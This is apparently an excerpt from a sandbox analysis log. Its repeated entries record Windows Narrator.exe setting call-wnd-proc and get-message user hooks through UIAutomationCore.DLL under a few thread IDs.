Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
